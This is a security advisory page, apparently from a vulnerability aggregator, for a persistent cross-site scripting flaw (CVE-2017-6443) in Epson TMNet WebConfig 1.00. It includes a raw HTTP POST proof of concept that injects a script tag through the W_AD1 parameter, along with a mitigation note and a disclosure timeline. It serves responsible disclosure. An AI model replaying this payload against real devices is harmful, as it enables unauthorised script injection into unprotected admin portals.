EPSON TMNet WebConfig 1.00 Cross Site Scripting

🗓️ 05 Mar 2017 00:00:00Reported by Michael BenichType

packetstorm🔗 packetstormsecurity.com👁 43 Views

Cross Site Scripting in EPSON TMNet WebConfig 1.0

Reporter	Title	Published	Views	Family All 9
0day.today	EPSON TMNet WebConfig 1.00 - Cross-Site Scripting Vulnerability	5 Mar 201700:00	–	zdt
CVE	CVE-2017-6443	15 Mar 201715:00	–	cve
Cvelist	CVE-2017-6443	15 Mar 201715:00	–	cvelist
Exploit DB	EPSON TMNet WebConfig 1.00 - Cross-Site Scripting	3 Mar 201700:00	–	exploitdb
EUVD	EUVD-2017-15500	7 Oct 202500:30	–	euvd
exploitpack	EPSON TMNet WebConfig 1.00 - Cross-Site Scripting	3 Mar 201700:00	–	exploitpack
NVD	CVE-2017-6443	15 Mar 201715:59	–	nvd
OSV	CVE-2017-6443	15 Mar 201715:59	–	osv
Prion	Cross site scripting	15 Mar 201715:59	–	prion

`Summary: Persistent cross-site scripting (XSS) in the web interface of Epson's TMNet WebConfig Ver 1.00 application allows a remote attacker to introduce arbitary Javascript via manipulation of an unsanitized POST parameter.  
------------------------------------------------------------------------  
Vendor: EPSON  
------------------------------------------------------------------------  
Software Link: https://c4b.epson-biz.com/modules/community/index.php?content_id=50  
------------------------------------------------------------------------  
Version: 1.00  
------------------------------------------------------------------------  
Identifier: CVE-2017-6443  
------------------------------------------------------------------------  
Exploit Author: Michael Benich  
Contact: benichmt1 [at] protonmail.com or @benichmt1  
  
------------------------------------------------------------------------  
PoC:  
  
  
1) Make a POST request using a proxy application like Burp  
  
  
------------------------------------------------------------------------  
POST /Forms/oadmin_1 HTTP/1.1  
  
Host: XXX.XXX.XXX.XXX  
  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
Referer: http://XXX.XXX.XXX.XXX/oadmin.htm  
  
Connection: close  
  
Upgrade-Insecure-Requests: 1  
  
Content-Type: application/x-www-form-urlencoded  
  
Content-Length: 47  
  
  
  
W_AD1=<script>window.alert(0)</script>&W_Link1=&Submit=SUBMIT  
  
  
  
------------------------------------------------------------------------  
  
2) Browsing to the main page will execute your script. This remains persistent for any user who then visits this page.  
  
  
  
GET /istatus.htm HTTP/1.1  
  
Host: XXX.XXX.XXX.XXX  
  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
Referer: http://XXX.XXX.XXX.XXX/side.htm  
  
Connection: close  
  
Upgrade-Insecure-Requests: 1  
------------------------------------------------------------------------  
Mitigation:  
  
The application by default ships without a password - consider adding strong authentication to this portal.  
  
------------------------------------------------------------------------  
  
  
Timeline:  
  
------------------------------------------------------------------------  
12/1/2016 - Discovery.  
12/9/2016 - Emailed support@ , info@ , and domain-admin@ emails. No response.  
12/16/2016 - Pinged on Twitter. Recommended to contact through support.  
12/22/2016 - Reached on LinkedIn directly to individual listed as Security Engineer and asked to find proper security contact channel. No response, but the connection request was accepted.  
3/3/2017 - Disclosure  
------------------------------------------------------------------------  
  
  
`

05 Mar 2017 00:00Current

6.4Medium risk

Vulners AI Score6.4

EPSS0.0201